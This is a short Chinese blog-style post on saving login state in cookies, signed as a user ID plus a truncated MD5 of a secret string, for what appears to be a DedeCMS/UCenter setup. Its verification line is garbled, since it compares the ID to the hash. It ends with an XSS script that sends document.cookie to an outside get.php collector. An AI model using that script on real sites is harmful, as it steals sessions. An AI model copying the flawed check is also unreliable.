cookie 验证用户登录

最近也不知道 做了些什么。 用cookie保存登录信息

用户登陆  
     ↓
判断 验证码
↓
验证用户名是否合法
↓
判断密码是不是空
↓
验证用户和密码（登陆）

    如果dede不存在 就去查询UC是否存在  
          存在 就创建dede用户
          然后登陆

     如果登陆正确
           查看UC存在？
               不存在就注册uc一个

用户登陆 就是把登陆时间 和用户ID和用户名称 写到cookie种

自定义串+值 然后MD5 然后substr

比如:
ID 为 8899的人
写入2个cookie
                   id=8899
                   id_chk=substr(md5("加密串"+"8899"),0,16)

读取cookie的时候 判断cookie是否正确就行了   NB

读取的时候
   8899==substr(md5("加密串"+"8899"),0,16) 才 读取值否则值为空

当然你会绝对不安全，COOKIE被盗了 怎么办。。~ 其实你的cookie都被连窝端了。。别的信息也都丢了.

随便提供利用xss漏洞一个盗取别人cookie的代码

<script>
img = new Image();
img.src = "http://www.kengni.com/get.php?cookie="+document.cookie;"
</script>

get.php 当然就是保存cookie的内容用的啦。。